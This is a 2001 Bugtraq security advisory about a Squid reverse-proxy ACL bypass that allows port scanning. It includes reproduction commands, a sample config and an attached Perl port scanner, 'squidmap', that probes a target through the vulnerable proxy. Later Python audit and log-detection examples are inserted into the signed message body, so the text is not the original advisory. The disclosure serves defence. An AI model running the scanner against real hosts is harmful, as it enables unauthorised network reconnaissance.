[21620] in bugtraq


Squid httpd acceleration acl bug enables portscanning

daemon@ATHENA.MIT.EDU (Paul Nasrat)
Wed Jul 18 16:24:11 2001

Date: Wed, 18 Jul 2001 21:16:01 +0100
From: Paul Nasrat <pnasrat@uk.now.com>
To: bugtraq@securityfocus.com
Message-ID: <20010718211601.A23897@uk.now.com>
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="Dxnq1zWXvFF0Q93v"
Content-Disposition: inline

--Dxnq1zWXvFF0Q93v
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Security Advisory: NASR-2001-001 <pnasrat@uk.now.com>
Date: 18 July 2001

Summary:

Squid can be used as an open proxy, and to portscan, when it is set up as an
httpd accelerator (reverse proxy).

Versions Affected:

2.3STABLE3 and 2.3STABLE4 unpatched

This includes the RedHat 7.0 squid, but not RedHat 6.2 or 7.1;
vendors basing their RPMs on RedHat 7.0 are advised to check and
apply the patch from the Squid site.  Debian uses 2.2 and 2.4 and so
is unaffected.

Description of problem:

Squid 2.3STABLE4 has a known bug which causes it to ignore acls in
httpd_accel mode.  Note that this applies only when httpd_accel_host is set
and httpd_accel_with_proxy is off.  This is not the default
configuration, so a Squid is not vulnerable without these configuration
changes.

This enables portscanning via a Squid running in this mode,
potentially allowing remote attackers to compromise machines through
a Squid set up this way.
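As an added example (not code from the advisory or from the Squid project), the following Python audit helper checks a squid.conf for the combination described above: httpd_accel_host set and httpd_accel_with_proxy off (Squid's default when the directive is absent) on one of the unpatched releases named in this advisory. It also flags two related configuration slips, an acl line missing its type keyword and an http_access list that does not end in an explicit deny (Squid applies the opposite of the last rule to unmatched requests). The sample configuration is constructed here, modelled on the squid.conf attached below; AFFECTED, normalise_version, parse_conf and audit_squid_conf are names chosen for this example.

```python
"""Audit a Squid 2.3 configuration for the httpd_accel ACL-bypass condition.

Hypothetical audit helper (not part of Squid or of the advisory): it flags
the exact combination the advisory describes plus two related config slips.
"""
import re

# Constructed sample, modelled on the squid.conf attached to the advisory.
SAMPLE_CONF = """\
http_port 3128
acl all src 0.0.0.0/0.0.0.0
acl manager proto cache_object
acl localhost src 127.0.0.1/255.255.255.255
acl SSL_ports port 443 563
acl Safe_ports port 80
acl CONNECT method CONNECT
http_access allow manager localhost
http_access deny manager
http_access deny CONNECT !SSL_ports
http_access deny !Safe_ports
http_access allow localhost
httpd_accel_host localhost
httpd_accel_port 80
httpd_accel_with_proxy  off
"""

# Unpatched releases named in the advisory, normalised (dots removed, upper
# case) so that "2.3.STABLE4" and "2.3STABLE4" compare equal.
AFFECTED = {"23STABLE3", "23STABLE4"}


def normalise_version(version):
    """Reduce a Squid version string to digits and letters only."""
    return re.sub(r"[^0-9A-Z]", "", version.upper())


def parse_conf(text):
    """Return {directive: [argument lists]} in file order, comments stripped."""
    conf = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        name, *args = line.split()
        conf.setdefault(name, []).append(args)
    return conf


def audit_squid_conf(text, version):
    """Return a list of (code, message) findings for one squid.conf."""
    conf = parse_conf(text)
    findings = []

    # 1. The advisory's condition: accelerator host set, proxy mode off,
    #    running an unpatched affected release -> http_access ACLs are ignored.
    accel_host_set = bool(conf.get("httpd_accel_host"))
    with_proxy = conf.get("httpd_accel_with_proxy", [["off"]])[-1]  # Squid default: off
    proxy_off = [w.lower() for w in with_proxy[:1]] == ["off"]
    if accel_host_set and proxy_off and normalise_version(version) in AFFECTED:
        findings.append(("ACL_BYPASS",
                         "httpd_accel_host set with httpd_accel_with_proxy off on "
                         f"unpatched {version}: http_access ACLs are ignored; "
                         "apply the patch from squid-cache.org"))

    # 2. An acl line needs a name, a type and at least one value.
    for args in conf.get("acl", []):
        if len(args) < 3:
            findings.append(("MALFORMED_ACL",
                             f"'acl {' '.join(args)}' lacks an acl type, "
                             "e.g. 'acl Safe_ports port 80'"))

    # 3. Without an explicit final deny, Squid applies the opposite of the
    #    last rule to unmatched requests; make the policy explicit instead.
    rules = conf.get("http_access", [])
    if not rules or rules[-1][:1] != ["deny"]:
        findings.append(("NO_FINAL_DENY",
                         "http_access list does not end with an explicit deny rule"))
    return findings


if __name__ == "__main__":
    for code, msg in audit_squid_conf(SAMPLE_CONF, "2.3STABLE4"):
        print(f"{code}: {msg}")
```

Run against the sample it reports ACL_BYPASS and NO_FINAL_DENY; turning httpd_accel_with_proxy on (or moving to a patched release) and appending `http_access deny all` clears both.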

I discovered this whilst doing a security test on a variety of configs
and later confirmed it from the squid site below:

http://www.squid-cache.org/Versions/v2/2.3/bugs/

Steps to Reproduce:

1. Set squid to httpd_accel mode, with a particular host and strict
   acls

2. export http_proxy="http://squid-server:port"

3. lynx http://victim:port/

Actual Results:  You get an HTTP 200 code if the port is open, and for
some services (SSH, SMTP, etc.) a response body as well.

Expected Results:  Should be access denied (403)

Discussion:

Proxies have often been used in anonymizing attacks on http, but as more sites use reverse proxying as a method of distributing their network load and load balancing requests there is the possibility that malicious users could gain proxied access or internal information via them.

I attach a sample squid.conf and a sample perl portmapper taking advantage of this bug.  Squid will log you running this so it isn't anonymous, and the task of discovering accelerated sites automatically is left as an exercise for the reader.
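Because Squid logs every request that passes through it, the scan described above leaves a recognisable trail in access.log: one client requesting many distinct ports on one host within a short time. As an added example (not part of the original post), here is a Python detector that runs over constructed log lines in Squid's native access.log format and reports that pattern; detect_port_sweeps, parse_line and the sample lines are chosen for this example, and the min_ports and window thresholds are assumptions to tune to the site.

```python
"""Flag port-sweep patterns in Squid native access.log lines.

Hypothetical detector (not part of Squid or the advisory): groups log entries
per (client, target host) and reports a client that touches many distinct
ports on one host within a sliding time window.
"""
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample in Squid's native log format:
# time elapsed client code/status bytes method URL ident hierarchy/peer type
SAMPLE_LOG = """\
995486101.210    12 10.9.8.7 TCP_MISS/200 4120 GET http://www.example.test/ - DIRECT/192.0.2.10 text/html
995486102.004    30 198.51.100.23 TCP_MISS/200 57 GET http://192.0.2.10:22/ - DIRECT/192.0.2.10 -
995486102.051    28 198.51.100.23 TCP_MISS/200 91 GET http://192.0.2.10:25/ - DIRECT/192.0.2.10 -
995486102.102  2001 198.51.100.23 TCP_MISS/503 0 GET http://192.0.2.10:79/ - DIRECT/192.0.2.10 -
995486102.150    25 198.51.100.23 TCP_MISS/200 4120 GET http://192.0.2.10:80/ - DIRECT/192.0.2.10 text/html
995486102.190    35 198.51.100.23 TCP_MISS/200 64 GET http://192.0.2.10:110/ - DIRECT/192.0.2.10 -
995486102.240  2003 198.51.100.23 TCP_MISS/503 0 GET http://192.0.2.10:111/ - DIRECT/192.0.2.10 -
995486240.500    10 10.9.8.7 TCP_HIT/200 4120 GET http://www.example.test:80/ - NONE/- text/html
"""


def parse_line(line):
    """Extract time, client, status and target host:port from one native-format line."""
    f = line.split()
    if len(f) < 7:
        return None
    method, url = f[5], f[6]
    if method == "CONNECT":            # CONNECT targets are logged as host:port
        host, sep, port = url.rpartition(":")
        if not sep:
            host, port = url, "443"
        port = int(port) if port.isdigit() else 443
    else:
        u = urlsplit(url)
        host = u.hostname or ""
        port = u.port or (21 if u.scheme == "ftp" else 80)
    return {"time": float(f[0]), "client": f[2], "status": f[3],
            "host": host, "port": port}


def detect_port_sweeps(lines, min_ports=5, window=60.0):
    """Return {(client, host): ports} for clients hitting >= min_ports distinct
    ports on one host within any `window`-second span."""
    events = defaultdict(list)
    for line in lines:
        e = parse_line(line)
        if e:
            events[(e["client"], e["host"])].append((e["time"], e["port"]))

    alerts = {}
    for key, evs in events.items():
        evs.sort()
        lo = 0
        for hi in range(len(evs)):
            # Slide the window start forward until it covers at most `window` seconds.
            while evs[hi][0] - evs[lo][0] > window:
                lo += 1
            ports = {p for _, p in evs[lo:hi + 1]}
            if len(ports) >= min_ports:
                alerts[key] = alerts.get(key, set()) | ports
    return alerts


if __name__ == "__main__":
    for (client, host), ports in detect_port_sweeps(SAMPLE_LOG.splitlines()).items():
        print(f"{client} swept {len(ports)} ports on {host}: {sorted(ports)}")
```

Note that a request is counted whether or not the port answered (the 503 entries count too), since the sweep itself, not its success, is what the defender wants to see; the browsing client that only ever fetches port 80 produces no alert.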

Solution:

The Squid developers are aware of this bug and have a patch on their site.

RedHat, Immunix and others have been notified and updates
are expected later today.

Consider additional security measures such as a
Squid redirector, packet filtering, etc.

Paul Nasrat

- -- 
"we apologise for any inconvenience" - God's Last Message to His Creation
Courtesy of Douglas Adams
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE7VbucnB2rnqD9/ooRAlM2AJ4xXtjoiLpMH9PwWbh6d1KPQzTxOACgoTRA
5iTMflCCdMGKDMW8+NowgzI=
=lohz
-----END PGP SIGNATURE-----

--Dxnq1zWXvFF0Q93v
Content-Type: text/plain; charset=us-ascii
Content-Disposition: attachment; filename="squid.conf"

# Sample Squid Config
# Paul Nasrat <pnasrat@uk.now.com>

http_port 3128

cache_mem  128 MB

refresh_pattern		^ftp:		1440	20%	10080
refresh_pattern		^gopher:	1440	0%	1440
refresh_pattern 	.		0	20%	4320

acl all src 0.0.0.0/0.0.0.0
acl manager proto cache_object
acl localhost src 127.0.0.1/255.255.255.255
acl SSL_ports port 443 563
acl Safe_ports port 80
acl CONNECT method CONNECT

http_access allow manager localhost
http_access deny manager
http_access deny CONNECT !SSL_ports
http_access deny !Safe_ports
http_access allow localhost

httpd_accel_host localhost
httpd_accel_port 80
httpd_accel_with_proxy  off

--Dxnq1zWXvFF0Q93v
Content-Type: text/plain; charset=us-ascii
Content-Disposition: attachment; filename=squidmap

#!/usr/bin/perl
# Author: Paul Nasrat <pnasrat@uk.now.com>
# Date: 7 July 2001
$|++;                                   # unbuffered output so each port prints as it is tested
use LWP::UserAgent;
use HTTP::Request;
use Getopt::Std;

my %args;
getopts('b:P:t:L:H:', \%args);

if (!defined $args{t} || $args{t} eq "") {  # a target host is required
    print_help();
    exit 0;
}

my $version    = "1.0";                 # placeholder label; the original left $version undefined
my $low        = $args{L} || 1;
my $high       = $args{H} || 8192;
my $proxy      = $args{b};
my $proxy_port = $args{P} || 80;
my $target     = $args{t};

my $ua = LWP::UserAgent->new;
$ua->proxy(['http', 'ftp'], "http://$proxy:$proxy_port/");
print "squidmap $version scanning $target via http://$proxy:$proxy_port\n";
print "Port\tState\t\tService\t\tResponse\n";

for (my $port = $low; $port <= $high; $port++) {
    my $request = HTTP::Request->new('CONNECT', "http://$target:$port");
    my $res     = $ua->request($request);
    my $service = getservbyport($port, 'tcp') || '';

    # A 2xx back through the accelerator means the port answered
    if ($res->is_success) {
        print "$port\topen\t\t", $service, "\t\t", $res->content, "\n";
    }
}

sub print_help {
    print 'Usage: squidmap <options> where options:', "\n";
    print '-b host  HTTP proxy via host', "\n";
    print '-P ##    HTTP proxy port (default: 80)', "\n";
    print '-L ##    low end/start of range (default: 1)', "\n";
    print '-H ##    high end/end of range (default: 8192)', "\n";
    print '-t host  target to attempt to scan', "\n";
}

--Dxnq1zWXvFF0Q93v--
